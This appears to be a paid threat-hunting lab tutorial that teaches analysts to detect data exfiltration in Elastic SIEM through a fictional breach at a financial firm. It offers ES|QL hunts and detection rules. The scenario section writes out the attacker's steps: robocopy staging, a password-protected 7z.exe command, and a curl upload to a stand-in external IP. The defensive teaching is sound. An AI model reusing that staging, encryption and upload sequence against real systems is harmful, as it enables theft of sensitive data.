Hunt Forward Lab #007 — Threat Hunting for Bulk File Transfer & Archive Creation | MITRE ATT&CK T1039, T1560.001, T1048.002
🔬 Difficulty: Intermediate — Estimated Time: 45–60 minutes 🗂️ MITRE ATT&CK: T1039 / T1560.001 / T1048.002 — Data from Network Shared Drive / Archive via Utility / Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
How to use this lab: Read the story to understand the attack. Then follow the Hunt section to find it yourself in Elastic SIEM. Document your findings in your Hunt Notebook as you go — you’ll use them to build your GitHub portfolio at the end.
Part 1 — The Scenario
1a — The Story Scene
Thursday afternoon. Meridian Financial’s SOC. 4:47 PM.
Alex Chen had been staring at the same DLP alert for six minutes when Marcus wheeled over.
“What’ve you got?”
“Nothing. That’s the problem.” She tilted the screen toward him. “DLP flagged a large outbound transfer to an external IP at 15:10. By the time the alert fired, the connection was already closed. The file is gone.”
Marcus studied the IP. “203.0.113.42. That’s the same C2 we saw last quarter.”
“Yeah.” Alex pulled up the endpoint timeline for WKSTN-MORGAN. "Morgan's machine. Service account — svc_emr_db. Which means someone with stolen credentials got onto a workstation and used a service account context to avoid triggering our user-behaviour baselines."
“Smart.” Marcus did not sound impressed. “What was transferred?”
“That’s what I’m trying to figure out. The DLP alert gives us the destination and the volume — 47 megabytes. It doesn’t tell us what 47 megabytes of data looked like before it left.”
That was the thing about data exfiltration. By the time most teams noticed it, the data was already gone. The only way to understand the scope — and answer the question every executive was going to ask in twenty minutes — was to work backwards. What files were accessed before the transfer? How were they packaged? How were they sent?
Alex opened a new ES|QL query and started at the beginning.
Now it’s your turn to find it.
1b — How Data Exfiltration Works — Simply Explained
Step 1: What attackers are actually trying to steal
After an attacker gets into a network — through phishing, stolen credentials, or lateral movement — their end goal is usually data. Financial records, patient files, intellectual property, credentials, employee PII. The data has value: for selling, for ransom leverage, or for competitive intelligence. But they can’t just walk out with a hard drive. They have to move the data across the network to somewhere they control, without triggering alerts designed to catch exactly that.
Step 2: The three phases every exfiltration attempt goes through
Attackers almost never upload raw files directly. They follow a three-step process, and each step leaves its own tracks in your logs:
- Collection: bulk-reading or copying files from network shares to a local staging location. This is where the volume anomaly appears: one account reading dozens of sensitive files in minutes.
- Archiving: compressing and encrypting the staged files into a single archive using tools like 7-Zip or PowerShell’s Compress-Archive. Encryption hides the contents from DLP inspection; compression reduces transfer time and volume.
- Exfiltration: uploading the archive to an attacker-controlled server over HTTPS, making the traffic look like a normal encrypted web request.
The attacker’s advantage: each step looks almost normal in isolation. File access, archive creation, and HTTPS uploads all happen constantly in a healthy network. The signal is in the combination — and the statistical outliers.
Step 3: How the attack works
Normal file server activity (a single employee accessing one report):
User: a.chen | File: Q4_report.xlsx | Size: 280 KB | Process: EXCEL.EXE
Time: 09:15 → 09:16 | 1 file in ~60 seconds
Attacker bulk-staging data (stolen service account):
User: svc_emr_db | Files: 35 files across EMR$, Finance$, HR$, Legal$
Sizes: 1 MB – 8 MB per file | Process: robocopy.exe
Time: 14:00 → 14:43 | 35 files in 43 minutes | ~47 MB total
Then: 7z.exe -tzip -p[password] -mhe=on → update_pkg.zip (45 MB encrypted)
Then: curl.exe POST https://203.0.113.42/api/upload (8 chunks × ~6 MB)
What DLP sees vs what actually happened:
DLP alert: "Large outbound transfer: 47 MB to 203.0.113.42"
What it misses: 35 files read, 43 minutes of staging, 7z.exe with -mhe (header encryption)
Step 4: Why defenders miss it
┌─────────────────────────────────────────────────────────────────────────────┐
│ WHAT SECURITY TOOLS SEE │
│ │
│ File access: svc_emr_db read 35 files — service accounts do this │
│ 7z.exe: compression utility — IT uses it for backups │
│ HTTPS upload: encrypted outbound traffic — indistinguishable from SaaS │
│ Total time: ~2 hours — spread thin enough to avoid rate alerts │
│ │
│ WHAT ACTUALLY HAPPENED │
│ │
│ 35 sensitive files read in 43 minutes — 50× normal rate for this account │
│ 7z.exe from AppData\Temp — not from Program Files (attacker-dropped tool) │
│ curl.exe from AppData\Temp — not a standard user workstation binary │
│ 8 uploads to same external IP — internal backup goes to 10.0.0.50, not │
│ 203.0.113.42 │
└─────────────────────────────────────────────────────────────────────────────┘
Think of it like a warehouse with an inventory system. Every item that leaves has to be scanned out, but the system only flags individual items over a certain weight. An attacker who takes 35 medium-sized boxes, repackages them into one large crate labelled “equipment return,” and ships it out via the regular loading dock never triggers a single scan. The anomaly isn’t any one step. It’s the sequence.
Step 5: Why it leaves tracks
Exfiltration can’t hide the following statistical signatures — and each one is a hunt signal:
- Access rate spike: one account reading far more files per minute than its own historical baseline, especially across multiple sensitive share paths simultaneously
- Archive tool process in unexpected path: 7z.exe or Compress-Archive spawned from AppData\Temp or C:\Users\*\AppData rather than a managed software directory
- Asymmetric upload ratio: network connections where bytes_out massively exceeds bytes_in (uploads, not browsing); normal HTTPS traffic is the opposite
- Single external destination, chunked volume: the same external IP receiving multiple large uploads in sequence, each sized just under a DLP threshold
None of that is a signature. But an analyst with the right ES|QL query can spot it in seconds. That’s exactly what you’re about to do.
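To see why chunking defeats a per-transfer check but not a per-destination total, here is a minimal Python sketch. The 10 MB DLP limit and the second IP address are hypothetical values chosen for illustration; only the eight chunks of roughly 6 MB to 203.0.113.42 come from the scenario.

```python
from collections import defaultdict

MB = 1024 * 1024
PER_TRANSFER_LIMIT_MB = 10  # hypothetical DLP threshold, not taken from the lab

# Eight uploads of roughly 6 MB to one external IP (scenario figures),
# plus one unrelated 2 MB upload to a hypothetical second destination.
uploads = [("203.0.113.42", 6 * MB)] * 8 + [("198.51.100.7", 2 * MB)]


def flag_per_transfer(events, limit_mb):
    """Return the transfers that individually exceed the limit."""
    return [e for e in events if e[1] / MB > limit_mb]


def total_mb_by_destination(events):
    """Sum bytes per destination IP and convert the totals to megabytes."""
    totals = defaultdict(int)
    for dest, nbytes in events:
        totals[dest] += nbytes
    return {dest: round(total / MB, 2) for dest, total in totals.items()}


per_transfer_hits = flag_per_transfer(uploads, PER_TRANSFER_LIMIT_MB)
totals = total_mb_by_destination(uploads)

print(per_transfer_hits)  # no single chunk crosses the limit
print(totals)             # the per-destination sum exposes the volume
```

No individual chunk trips the per-transfer check, yet the grouped total for the single destination is impossible to miss. That grouping step is the idea the hunts in Part 4 rely on.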
Part 2 — Your Mission
By the end of this lab you will have:
- ✅ Detected a bulk file collection burst using file access rate analysis
- ✅ Found archive creation by an attacker-dropped 7-Zip binary in a suspicious path
- ✅ Identified chunked HTTPS exfiltration using upload-ratio anomaly detection
- ✅ Quantified the total data loss in megabytes
- ✅ Built a complete attack timeline from collection → archive → exfil → cleanup
- ✅ Documented the full investigation in your Hunt Notebook for your GitHub portfolio
Part 3 — Lab Setup
Getting Into the Lab
No manual Elastic setup required — Hunt Forward handles all of it.
- Go to hunt-forward.com
- Enter your email — Stripe checkout, card required, not charged for 7 days
- Dashboard unlocks immediately — all labs accessible
- Accept the Elastic Cloud invite → “Accept Invitation → Access SIEM”
- Check your dashboard status — Pending → ✓ Invite Sent within ~5 minutes
Once you’re in Elastic:
- Kibana → Discover
- Index: exfil-lab-logs
- Time range: March 6, 2025, 10:00 AM to 6:00 PM
A Quick Word on ES|QL
Throughout this lab we use ES|QL — Elasticsearch Query Language — instead of clicking through visualisation menus. ES|QL lets you filter, group, count, and calculate statistics on your logs in a single query, directly in Discover.
Every ES|QL query starts with FROM and pipes data through commands using |. Think of each | as "then do this next thing to the results."
To run ES|QL in Kibana:
- In Discover, click the language selector dropdown (top left — it may say KQL or Lucene)
- Select ES|QL
- Paste the query and press Run (▶)
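If the pipe model is new to you, the same "filter, then group, then sort" flow can be sketched in plain Python. The rows below are hypothetical stand-ins for documents in an index, and the field names are simplified for illustration; the comments show roughly which ES|QL step each line corresponds to.

```python
from collections import Counter

# Hypothetical rows standing in for documents in an index
rows = [
    {"category": "file", "user": "svc_emr_db"},
    {"category": "file", "user": "svc_emr_db"},
    {"category": "file", "user": "a.chen"},
    {"category": "network", "user": "a.chen"},
]

# FROM rows | WHERE category == "file"
file_rows = [r for r in rows if r["category"] == "file"]

# | STATS file_count = COUNT(*) BY user
counts = Counter(r["user"] for r in file_rows)

# | SORT file_count DESC | LIMIT 1
top = counts.most_common(1)

print(top)
```

Each step only sees the output of the step before it, which is exactly how the ES|QL queries in this lab should be read.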
Part 4 — The Hunt
Hunt 1 — File Access Rate Spike (Bulk Collection)
The first signal in any exfiltration is the collection phase. Attackers need to stage data locally before they can archive and send it. That means one account reading a high volume of files in a short window — a rate that stands out against every other user on the file server.
The key insight: we’re not looking for a specific filename. We’re looking for abnormal access velocity from a single identity across multiple sensitive share paths.
FROM exfil-lab-logs
| WHERE event.category == "file"
AND event.action == "file-accessed"
| STATS
file_count = COUNT(*),
total_bytes = SUM(file.size),
unique_paths = COUNT_DISTINCT(file.path)
BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 10
| SORT file_count DESC
| LIMIT 20
What each line does:
- FROM exfil-lab-logs: query the lab dataset
- WHERE event.category == "file" AND event.action == "file-accessed": scope to file read events only, filtering out write and delete events
- STATS file_count = COUNT(*), total_bytes = SUM(file.size), unique_paths = COUNT_DISTINCT(file.path) BY host.name, user.name, process.name: count how many files each user+host+process combination touched, sum the total bytes, and count distinct file paths to measure breadth of access
- EVAL total_mb = ROUND(total_bytes / 1048576.0, 2): convert raw bytes to megabytes inline, rounded to 2 decimal places
- WHERE file_count > 10: filter out low-volume normal activity; focus on accounts that read more than 10 files
- SORT file_count DESC: surface the highest-volume accessor first
- LIMIT 20: return top 20 rows
What to look for in results: The top row should stand out dramatically from all others. Look for a user+process combination where file_count is 10× or more above the next row, where total_mb is in the tens of megabytes, and where process.name is something unexpected for file access — robocopy.exe instead of EXCEL.EXE or explorer.exe.
📝 Hunt Notebook checkpoint: Record the top anomalous row: user name, host name, process name, file count, and total MB accessed. Note whether the accessing process is a normal office application or a bulk-copy/scripting tool.
✅ Bulk collection confirmed. svc_emr_db on WKSTN-MORGAN accessed 35 files totalling ~47 MB via robocopy.exe, vastly above any other user in the dataset. The process alone is a red flag: robocopy.exe has no legitimate reason to be running under a service account from a workstation.
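One detail in the Hunt 1 query is easy to overlook: the divisor is written as 1048576.0, not 1048576. ES|QL divides two integer values as integers, so the decimal point is what keeps the fractional megabytes. The Python sketch below shows the same effect; the byte count is a hypothetical value picked to make the difference visible.

```python
BYTES_PER_MB = 1048576

total_bytes = 49_807_360  # hypothetical total, equal to exactly 47.5 MB

# Integer division drops the fraction, as an integer divisor would in the query
truncated_mb = total_bytes // BYTES_PER_MB

# Floating-point division keeps it, matching ROUND(total_bytes / 1048576.0, 2)
precise_mb = round(total_bytes / float(BYTES_PER_MB), 2)

print(truncated_mb, precise_mb)
```

Half a megabyte is trivial here, but the same truncation on a ratio below 1 would collapse it to 0, so it is a habit worth keeping in every EVAL that divides.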
Hunt 2 — Archive Creation in a Suspicious Path
The second signal is the archiving step. Legitimate compression tools like 7-Zip are installed by IT to C:\Program Files\7-Zip\7z.exe. An attacker who drops their own copy to AppData\Temp to avoid relying on IT-managed software is visible the moment you filter on the executable path.
We also look for password-protected compression (-p flag) and encrypted headers (-mhe=on) in the command line — features that have no use case in a legitimate backup or IT workflow.
FROM exfil-lab-logs
| WHERE event.category == "process"
AND (
process.name == "7z.exe"
OR process.name == "7za.exe"
OR process.command_line LIKE "*Compress-Archive*"
OR process.command_line LIKE "*-tzip*"
)
| EVAL suspicious_path = CASE(
process.executable LIKE "*\\\\AppData\\\\*", "YES — AppData",
process.executable LIKE "*\\\\Temp\\\\*", "YES — Temp",
process.executable LIKE "*\\\\ProgramData\\\\*", "YES — ProgramData",
"NO — managed path"
)
| EVAL has_password = CASE(
process.command_line LIKE "*-p*", "YES",
"NO"
)
| KEEP host.name, user.name, process.name, process.executable,
process.command_line, process.parent.name,
suspicious_path, has_password, @timestamp
| SORT @timestamp ASC
What each line does:
- WHERE event.category == "process" AND (...): find any process event involving common archive utilities or PowerShell compression commands
- EVAL suspicious_path = CASE(...): derive a label field that flags the row if the archive tool is running from AppData, Temp, or ProgramData, directories where attackers drop tools to avoid IT software inventories
- EVAL has_password = CASE(...): flag rows where the command line contains -p, indicating password-protected compression
- KEEP ...: return only the fields relevant to this investigation, reducing noise
- SORT @timestamp ASC: order by time so you can see the archive creation sequence as it happened
What to look for in results: Any row where suspicious_path = YES — AppData or similar is an immediate priority. Combine that with has_password = YES and you have a high-confidence archive creation event. Note the process.parent.name — if the archiver was spawned by cmd.exe or powershell.exe rather than an installer, that's a further indicator of attacker activity.
📝 Hunt Notebook checkpoint: Record the full process.command_line for any flagged row. Note the output filename in the command (the archive name the attacker chose), the executable path (confirms it's not a managed installation), and the password flag. The archive filename often reveals the attacker's masquerade strategy.
✅ Rogue archive creation confirmed. 7z.exe ran from C:\Users\morgan\AppData\Local\Temp\7z.exe (attacker-dropped, not IT-managed) with flags -tzip -p3x!tr@c3d -mhe=on, creating a password-encrypted, header-encrypted ZIP. The output was named WindowsDefender_Update_KB5034441.zip to masquerade as a Windows patch package.
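The two derived fields in Hunt 2 are simple string tests, which makes them easy to reason about offline. The sketch below mirrors them in Python and also shows a limitation worth knowing: a bare "-p" substring match will also hit paths such as backup-prod. The stricter token check and the benign command line are illustrative assumptions, not part of the lab, and unlike LIKE the path check here lowercases its input first.

```python
SUSPICIOUS_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\")


def suspicious_path(executable: str) -> bool:
    """True if the binary lives under a user-writable directory."""
    lowered = executable.lower()
    return any(d in lowered for d in SUSPICIOUS_DIRS)


def loose_password_flag(command_line: str) -> bool:
    """Same idea as LIKE "*-p*": any "-p" substring counts."""
    return "-p" in command_line


def strict_password_flag(command_line: str) -> bool:
    """Only count "-p" when it starts a whitespace-delimited argument."""
    return any(tok.startswith("-p") for tok in command_line.split())


# Executable path and flags as reported in the lab write-up
attacker_exe = r"C:\Users\morgan\AppData\Local\Temp\7z.exe"
attacker_cmd = "7z.exe -tzip -p3x!tr@c3d -mhe=on"

# Hypothetical benign command whose path happens to contain "-p"
benign_cmd = r"7z.exe a -tzip logs.zip D:\backup-prod\logs"

print(suspicious_path(attacker_exe), strict_password_flag(attacker_cmd))
print(loose_password_flag(benign_cmd), strict_password_flag(benign_cmd))
```

The loose match is fine for a hunt, where you read every row anyway. For a standing rule, a tighter test along these lines may cut false positives, though splitting on whitespace is crude and will mishandle quoted paths that contain spaces.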
Hunt 3 — Asymmetric Upload Detection (Exfiltration)
Normal HTTPS browsing is asymmetric in one direction: users download far more than they upload. A request to load a webpage sends a few hundred bytes out and receives megabytes back. When you see the pattern reversed — large bytes_out, tiny bytes_in — on an outbound HTTPS connection, that's an upload. When it's repeated, to a single external IP, in chunks, that's exfiltration.
FROM exfil-lab-logs
| WHERE event.category == "network"
AND network.direction == "outbound"
AND destination.port == 443
AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
transfer_count = COUNT(*),
total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
avg_mb_per_transfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
max_upload_ratio = MAX(upload_ratio)
BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
| SORT total_mb_out DESC
| LIMIT 15
What each line does:
- WHERE ... destination.port == 443 AND network.bytes_out IS NOT NULL: scope to HTTPS outbound connections that have byte-count telemetry
- EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2): convert bytes sent to megabytes
- EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2): convert bytes received to megabytes
- EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1): compute the ratio of sent to received; adding 1 to the denominator prevents division-by-zero; a ratio of 1000+ means the connection is almost entirely outbound
- WHERE mb_out > 1.0: filter out small requests; focus on transfers over 1 MB
- STATS transfer_count = COUNT(*), total_mb_out = ROUND(SUM(...) / 1048576.0, 2), avg_mb_per_transfer = ..., max_upload_ratio = MAX(upload_ratio) BY host.name, user.name, destination.ip, process.name: group by destination IP and summarise how many transfers, total volume, average chunk size, and peak ratio
- WHERE transfer_count >= 2: filter to destinations that received multiple large uploads (chunked exfil pattern)
- SORT total_mb_out DESC: surface the highest-volume destination first
What to look for in results: The top row should show a single external IP receiving multiple transfers with a massive total_mb_out value and a max_upload_ratio in the thousands. Cross-reference the destination IP against the C2 you found in earlier labs. The process.name of curl.exe on a standard user workstation is another high-confidence indicator — curl is a developer/admin tool rarely present on end-user machines.
📝 Hunt Notebook checkpoint: Record the destination IP, total MB exfiltrated, transfer count, average chunk size, and the process responsible. The total_mb_out figure is your data loss estimate, and this number goes in the executive summary of your incident report.
✅ Exfiltration confirmed. curl.exe on WKSTN-MORGAN sent 8 transfers totalling ~47 MB to 203.0.113.42:443, with an average upload ratio of ~9,000:1 (near-zero response, massive upload). The destination IP matches the known C2 from the organisation's prior incidents.
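The upload ratio is plain arithmetic, so it helps to run it once by hand. This Python sketch applies the same formula as the query, bytes_out / (bytes_in + 1), to three hypothetical connections: a page load, a 6 MB upload chunk with a small response, and an upload with no response at all. The byte counts are made up for illustration.

```python
def upload_ratio(bytes_out: int, bytes_in: int) -> float:
    """Ratio of bytes sent to bytes received, rounded to one decimal.

    The +1 in the denominator avoids division by zero when nothing comes back.
    """
    return round(bytes_out / (bytes_in + 1), 1)


# Hypothetical page load: small request, large response
browse = upload_ratio(bytes_out=800, bytes_in=2_000_000)

# Hypothetical 6 MB upload chunk that receives a short acknowledgement
chunk = upload_ratio(bytes_out=6_291_456, bytes_in=699)

# Hypothetical upload with no response bytes at all
silent = upload_ratio(bytes_out=6_291_456, bytes_in=0)

print(browse, chunk, silent)
```

Browsing lands near zero while the upload chunk lands in the thousands, which is the separation the hunt depends on. Python's / always returns a float; in ES|QL, if both byte fields are mapped as integer types, the division is an integer division, so ratios below 1 would come back as 0 unless one side is cast to a double.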
Hunt 4 — Cleanup and Full Attack Scope
Attackers who clean up after themselves leave a different kind of evidence: file deletion events, directory removal, and a suspicious absence of the staging artefacts you’d expect to find. Correlating the cleanup events with the earlier signals confirms the full attack chain and gives you precise timestamps for your timeline.
FROM exfil-lab-logs
| WHERE host.name == "WKSTN-MORGAN"
AND (
(event.category == "file" AND event.action IN ("file-accessed", "file-created", "file-deleted", "directory-deleted", "file-renamed"))
OR (event.category == "process" AND process.name IN ("7z.exe", "robocopy.exe", "curl.exe", "cmd.exe"))
)
| EVAL event_label = CASE(
event.action == "file-accessed" AND process.name == "robocopy.exe", "1-COLLECTION",
process.name == "7z.exe", "2-ARCHIVE",
event.action == "file-renamed", "2-MASQUERADE",
process.name == "curl.exe", "3-EXFILTRATION",
event.action IN ("file-deleted", "directory-deleted"), "4-CLEANUP",
"OTHER"
)
| KEEP @timestamp, event_label, event.action, file.name, file.path,
process.name, process.command_line, user.name
| SORT @timestamp ASC
| LIMIT 50
What each line does:
- WHERE host.name == "WKSTN-MORGAN": scope entirely to the compromised host identified in Hunts 1–3
- AND (...): filter to file creation/deletion events and the specific attacker processes we've confirmed
- EVAL event_label = CASE(...): derive a phase label for each event, assigning "1-COLLECTION", "2-ARCHIVE", "3-EXFILTRATION", or "4-CLEANUP" based on the action and process name, so the results read as a timeline rather than a raw event list
- KEEP ...: surface only the fields needed to reconstruct the timeline
- SORT @timestamp ASC: chronological order, earliest to latest
What to look for in results: You should see a clean four-phase progression: collection events (robocopy file accesses) → archive creation (7z.exe) and rename → exfiltration (curl.exe uploads) → cleanup (file and directory deletions). Any gaps in the sequence are worth noting. The cleanup events confirm the attacker had operational security awareness — they didn’t just leave artefacts behind.
📝 Hunt Notebook checkpoint: Record the timestamp of the first collection event, the archive creation timestamp, the first and last upload timestamps, and the cleanup timestamp. Calculate the total attack window (first collection to last cleanup). Note the archive name used as a masquerade, and record all deleted files and directories as forensic artefacts that are no longer recoverable from the endpoint.
✅ Full attack chain confirmed. Four-phase exfiltration: collection (14:00–14:43) → archive + masquerade (14:45) → chunked HTTPS upload (15:10–15:58) → cleanup (16:05). Total window: ~2 hours. Total data loss: ~47 MB. Evidence of operational security: attacker renamed archive to a Windows patch filename and deleted all staging artefacts on exit.
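The phase labelling and the attack-window calculation can both be checked with a few lines of Python. The sketch below assumes CASE behaves as first-match-wins, so the order of the branches matters. The timestamps come from the lab timeline, with seconds assumed to be zero where none are given; the "start" action value and the cmd.exe process on the rename and delete events are hypothetical.

```python
from datetime import datetime


def phase(action, process):
    """Label an event; the first matching branch wins, as in CASE."""
    if action == "file-accessed" and process == "robocopy.exe":
        return "1-COLLECTION"
    if process == "7z.exe":
        return "2-ARCHIVE"
    if action == "file-renamed":
        return "2-MASQUERADE"
    if process == "curl.exe":
        return "3-EXFILTRATION"
    if action in ("file-deleted", "directory-deleted"):
        return "4-CLEANUP"
    return "OTHER"


DAY = (2025, 3, 6)  # lab date
events = [
    (datetime(*DAY, 14, 0), "file-accessed", "robocopy.exe"),
    (datetime(*DAY, 14, 45), "start", "7z.exe"),            # action name assumed
    (datetime(*DAY, 14, 45, 55), "file-renamed", "cmd.exe"),
    (datetime(*DAY, 15, 10), "start", "curl.exe"),          # action name assumed
    (datetime(*DAY, 16, 5), "file-deleted", "cmd.exe"),
    (datetime(*DAY, 16, 7), "file-deleted", "cmd.exe"),
]

labels = [phase(action, process) for _, action, process in events]

# Attack window: first collection event to last cleanup event, in minutes
window_minutes = int((events[-1][0] - events[0][0]).total_seconds() // 60)

print(labels)
print(window_minutes)
```

Measured from the first file read to the last deletion in the timeline, the window is a little over two hours, consistent with the ~2 hour figure in the summary.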
Part 5 — Building Your Timeline
┌─[WKSTN-MORGAN — Data Exfiltration Timeline]─────────────────────────────────────────┐
│ TIME (UTC) │ EVENT │ PHASE │
│───────────────┼───────────────────────────────────────────┼──────────────────────────│
│ 14:00 │ robocopy.exe launched by svc_emr_db │ Collection begins │
│ 14:00–14:43 │ 35 files read from EMR$, Finance$, HR$ │ Bulk staging (~47 MB) │
│ 14:43 │ robocopy.exe exits │ Staging complete │
│ 14:45 │ 7z.exe (AppData\Temp) creates archive │ Archive + encryption │
│ 14:45:47 │ update_pkg.zip created (45 MB) │ Compressed payload │
│ 14:45:55 │ Renamed → WindowsDefender_Update_KB*.zip │ Masquerade applied │
│ 15:08 │ curl.exe dropped to AppData\Temp │ Transfer tool staged │
│ 15:10 │ Upload chunk 1/8 → 203.0.113.42:443 │ Exfiltration begins │
│ 15:10–15:58 │ 8 × ~6 MB HTTPS POST chunks │ 47 MB exfiltrated │
│ 16:05 │ update_pkg.zip deleted │ Cleanup begins │
│ 16:05 │ staging\ directory removed │ Evidence destruction │
│ 16:07 │ curl.exe deleted │ Tool removed │
└─────────────────────────────────────────────────────────────────────────────────────┘
Part 6 — Document Your Hunt (Hunt Notebook → GitHub Portfolio)
Open your Hunt Notebook in the Hunt Forward dashboard. The pre-loaded template has every section ready for your findings.
Option A — Write your own report: Merge your four Hunt Notebook milestone blocks into a single document. Add a cover section:
- Analyst name and date
- Executive summary: what was stolen, from which host, via which account, total data volume
- IOC table: svc_emr_db, WKSTN-MORGAN, 203.0.113.42, C:\Users\morgan\AppData\Local\Temp\7z.exe, C:\Users\morgan\AppData\Local\Temp\curl.exe, archive filename
- Recommended remediation: isolate WKSTN-MORGAN, revoke svc_emr_db credentials, block 203.0.113.42 at perimeter, notify legal/compliance of ~47 MB potential PII exposure
Export as markdown → push to GitHub as hunt-007-data-exfiltration-detection.md
Option B — Download the Hunt Forward reference report: Use it to check your findings before writing your own version.
The recommendation: Write your own. The data loss quantification you produced in Hunt 3 — a specific megabyte figure, a named external IP, a confirmed process — is exactly the kind of evidence a CISO asks for in a breach notification decision. The fact that you can walk an interviewer through how you calculated it, line by line, is what makes this portfolio piece real.
Part 7 — What Alex Did Next
The executive summary took eleven minutes. 47 MB from EMR$, Finance$, HR$, and Legal$ — patient records, payroll data, wire transfer accounts, pending litigation files. The legal team was on the phone before Alex had finished typing the IOC table. Marcus submitted the containment ticket for WKSTN-MORGAN and the credential revocation for svc_emr_db simultaneously.
The DLP alert that started it all had fired forty-seven minutes after the first file was read. Alex added a note to the runbook: next time someone with a service account touches robocopy, don’t wait for DLP to tell you.
Part 8 — Operationalise Your Hunts as Detection Rules
Hunting manually is how you find the first incident. Detection rules are how you make sure the next analyst doesn’t have to start from scratch.
Each ES|QL query you ran in Part 4 can be turned into a standing rule in Elastic Security that fires automatically when the same pattern appears. Import the three rules below and they will run every 5 minutes against your exfil-lab-logs index — or swap the index name for your production data source.
To import: Elastic Security → Detection Rules → Import rules → select the .ndjson file from your Hunt Forward dashboard.
Rule 1 — Bulk File Collection via Network Share (HIGH)
Fires when a single account reads more than 20 files totalling over 10 MB using a bulk-copy process. Legitimate users access individual files on demand; this rate indicates automated staging.
FROM exfil-lab-logs*
| WHERE event.category == "file"
AND event.action == "file-accessed"
AND process.name IN ("robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe")
| STATS
file_count = COUNT(*),
total_bytes = SUM(file.size),
unique_paths = COUNT_DISTINCT(file.path)
BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 20
AND total_mb > 10
| SORT total_mb DESC
When this fires: Pivot to Hunt 1. Check whether 7z.exe or archive activity follows within 30 minutes. If Rule 2 also fires for the same host, you have a confirmed collection-to-archive sequence. Record total_mb in your Elastic Security Case as the staging volume estimate.
False positives to validate: Scheduled backup agents (BackupExec, Veeam) running under a known service account; IT mass file migrations during change-management windows.
Rule 2 — Archive Creation from Suspicious Path (HIGH)
Fires when 7-Zip or PowerShell Compress-Archive runs from a user-writable directory (AppData, Temp, ProgramData) rather than a managed installation path. Attacker-dropped archive tools live in user-writable directories to avoid software inventory detection. Password flags (-p, -mhe) indicate deliberate encryption to defeat DLP content inspection.
FROM exfil-lab-logs*
| WHERE event.category == "process"
AND (
process.name == "7z.exe"
OR process.name == "7za.exe"
OR process.command_line LIKE "*Compress-Archive*"
)
| EVAL suspicious_path = CASE(
process.executable LIKE "*\\\\AppData\\\\*", "YES",
process.executable LIKE "*\\\\Temp\\\\*", "YES",
process.executable LIKE "*\\\\ProgramData\\\\*","YES",
"NO"
)
| EVAL has_password = CASE(
process.command_line LIKE "*-p*", "YES",
"NO"
)
| WHERE suspicious_path == "YES"
| KEEP @timestamp, host.name, user.name, process.name,
process.executable, process.command_line,
process.parent.name, suspicious_path, has_password
| SORT @timestamp ASC
When this fires: Inspect the full process.command_line for the output archive path and filename; attackers frequently rename archives to mimic Windows patch packages (KB*.zip) or system files. Correlate with Rule 1 (bulk collection) and Rule 3 (asymmetric upload) to confirm the full exfiltration chain.
False positives to validate: Developers using portable 7-Zip builds in project directories; IT scripts that compress logs or reports using system PowerShell — review parent process and output path before dismissing.
Rule 3 — Chunked HTTPS Exfiltration — Asymmetric Upload (CRITICAL)
Fires when the same external IP receives 2 or more large HTTPS transfers totalling over 5 MB with an upload ratio above 100:1. Normal browsing sends small requests and receives large responses — exfiltration reverses this. Chunked transfers to a single destination indicate deliberate splitting to stay under DLP byte thresholds.
FROM exfil-lab-logs*
| WHERE event.category == "network"
AND network.direction == "outbound"
AND destination.port == 443
AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
transfer_count = COUNT(*),
total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
avg_mb_per_xfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
max_ratio = MAX(upload_ratio)
BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
AND total_mb_out > 5
AND max_ratio > 100
| SORT total_mb_out DESC
When this fires: The total_mb_out value is your data loss estimate for executive reporting, so record it in your Elastic Security Case immediately. Add destination.ip as a network IOC. If Rules 1 and 2 also fired for the same host within the preceding 2 hours, treat this as a confirmed exfiltration chain and escalate to critical incident response.
False positives to validate: Cloud backup agents (Acronis, CrashPlan, Backblaze) uploading to known endpoints — add backup destination IPs to an exception list; large file sharing via approved SaaS (SharePoint, Dropbox, Box) — validate destination IP against known SaaS CIDR ranges.
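The escalation logic described for Rule 3 (Rules 1 and 2 firing for the same host within the preceding 2 hours) can be sketched as a small correlation function. This is an illustration of the idea only, not how Elastic Security correlates alerts; the tuple layout, the alert times, and the WKSTN-EXAMPLE host are hypothetical.

```python
from datetime import datetime, timedelta


def confirmed_chains(hits, window=timedelta(hours=2)):
    """Return hosts where Rules 1 and 2 both fired within `window` before a Rule 3 hit.

    hits: list of (rule_number, host, fired_at) tuples.
    """
    confirmed = set()
    for rule, host, fired_at in hits:
        if rule != 3:
            continue
        prior = {
            r for r, h, t in hits
            if h == host and r in (1, 2) and timedelta(0) <= fired_at - t <= window
        }
        if prior == {1, 2}:
            confirmed.add(host)
    return confirmed


# Hypothetical alert times on the lab date
hits = [
    (1, "WKSTN-MORGAN", datetime(2025, 3, 6, 14, 45)),
    (2, "WKSTN-MORGAN", datetime(2025, 3, 6, 14, 50)),
    (3, "WKSTN-MORGAN", datetime(2025, 3, 6, 15, 15)),
    (3, "WKSTN-EXAMPLE", datetime(2025, 3, 6, 15, 20)),  # Rule 3 alone
]

result = confirmed_chains(hits)
print(result)
```

A host with only a Rule 3 hit still deserves a look, since it may be one of the backup or SaaS false positives listed above. The host where all three rules line up inside the window is the one to escalate first.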
Ready for the Next Lab?
- Lab #008 — Insider Threat Detection: Hunting behavioural baselines when the attacker already has legitimate credentials
New labs drop 2–3 times per week on Hunt Forward and Medium.